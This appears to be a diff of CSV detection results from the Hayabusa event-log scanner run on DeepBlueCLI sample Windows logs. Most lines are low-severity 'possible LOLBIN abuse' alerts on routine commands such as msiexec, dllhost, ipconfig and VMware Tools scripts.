+2016-09-03 23:49:56.148 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0x1608 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-03 23:49:56.315 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: c:\Windows\system32\MsiExec.exe -Embedding FCF342A8AA47B271C771D0C94D1CA700 E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0x158c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-03 23:49:59.727 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelReg.exe"" -msi -ia -v | Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelReg.exe | PID: 0x16ec | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-03 23:51:03.843 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0xdb4 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-03 23:51:03.998 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\MsiExec.exe -Embedding 5E2017AA7D1C6A31E9A7DE000332388B E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0x4cc | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-03 23:51:11.414 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0x12c0 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-03 23:51:11.583 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\MsiExec.exe -Embedding BA71DC5EB60F0E63B6B2273896748ED0 E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0x728 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-03 23:51:23.151 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0x1468 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-03 23:51:23.337 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\MsiExec.exe -Embedding 63DCF5B6F3ADD0E112DCFCDBC9A49554 E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0x554 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-03 23:51:37.272 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0xae8 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-03 23:51:37.462 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\MsiExec.exe -Embedding CE81D9B1345CD9F81599FCA563520F29 E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0x1014 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-03 23:52:34.610 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0xc3c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-03 23:52:34.820 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: c:\Windows\system32\MsiExec.exe -Embedding 03F824F4D05CDB05A799DCD0DF81BAF1 E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0x910 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-03 23:53:22.275 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0x1028 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-03 23:53:22.491 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: c:\Windows\system32\MsiExec.exe -Embedding 4DBAF3FC1CB10E33B65E99A4560027B6 E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0xb90 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-03 23:53:23.408 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelReg.exe"" -msi -ia -v | Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelReg.exe | PID: 0xefc | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-04 00:52:11.006 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: sc.exe start sppsvc | Path: C:\Windows\System32\sc.exe | PID: 0xfb8 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-04 06:19:44.532 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0x928 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-04 06:19:44.676 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan -Reinvoke | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xe20 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-04 06:19:44.692 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" SignaturesUpdateService -ScheduleJob | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0x270 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-04 06:21:44.528 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe aepdu.dll,AePduRunUpdate | Path: C:\Windows\System32\rundll32.exe | PID: 0xe88 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-04 06:27:33.432 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xe4 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-04 06:34:52.733 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: gpscript.exe /Logoff | Path: C:\Windows\System32\gpscript.exe | PID: 0x101c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-04 06:34:54.000 +09:00,IE10Win7,6006,info,,Event Log Service Stopped,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-04 06:35:14.000 +09:00,IE10Win7,6005,info,,Event Log Service Started,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-04 06:35:14.000 +09:00,IE10Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,../hayabusa-rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2016-09-04 06:35:15.773 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\dllhost.exe /Processid:{F3F72FE3-CF58-4A21-BBED-F596E5AFE5C0} | Path: C:\Windows\System32\dllhost.exe | PID: 0x6fc | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-04 06:35:16.101 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\dllhost.exe /Processid:{02D4B3F1-FD88-11D1-960D-00805FC79235} | Path: C:\Windows\System32\dllhost.exe | PID: 0x514 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-04 06:35:29.507 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x9d0 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-04 06:35:29.601 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: gpscript.exe /Logon | Path: C:\Windows\System32\gpscript.exe | PID: 0xa34 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-04 06:35:40.667 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Wallpaper\autologon.bat"" "" | Path: C:\Windows\System32\cmd.exe | PID: 0xd00 | User: IEUser | LID: 0x60b6f",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-04 06:35:46.165 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\wallpaper\bginfo.exe C:\wallpaper\bgconfig.bgi /timer:0 | Path: C:\Wallpaper\Bginfo.exe | PID: 0xe90 | User: IEUser | LID: 0x60b6f,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-04 06:36:24.719 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xad4 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-04 06:36:26.520 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x398 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-04 06:48:30.867 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\RunDll32.exe"" ""C:\Windows\system32\WerConCpl.dll"", LaunchErcApp -queuereporting | Path: C:\Windows\System32\rundll32.exe | PID: 0x650 | User: IEUser | LID: 0x60b9d",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-04 07:57:17.289 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x794 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-04 07:57:39.909 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xb68 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-04 08:03:14.642 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x9d0 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-04 08:03:14.751 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0xcc0 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-04 22:32:04.123 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\sc.exe start w32time task_started | Path: C:\Windows\System32\sc.exe | PID: 0x234 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-04 22:32:05.218 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x93c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-04 22:32:05.234 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xd94 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-04 22:32:05.439 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x958 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-04 22:32:15.400 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0xa60 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-04 22:32:23.091 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x67c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-04 23:37:56.230 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x944 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-04 23:37:59.307 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xd64 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-04 23:39:22.859 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xdcc | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-04 23:39:28.137 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x224 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-05 00:10:41.119 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x740 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-05 00:10:41.316 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0x44c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-15 11:13:20.120 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: sc.exe start sppsvc | Path: C:\Windows\System32\sc.exe | PID: 0xd98 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-15 11:13:20.122 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\sc.exe start w32time task_started | Path: C:\Windows\System32\sc.exe | PID: 0xfa0 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-15 11:13:21.221 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x7a8 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-15 11:13:21.470 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0xa7c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-15 11:13:30.470 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0xd50 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-15 12:28:48.887 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xb94 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-15 12:28:49.170 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0xb64 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-15 23:50:16.005 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x820 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-15 23:50:16.427 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x234 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
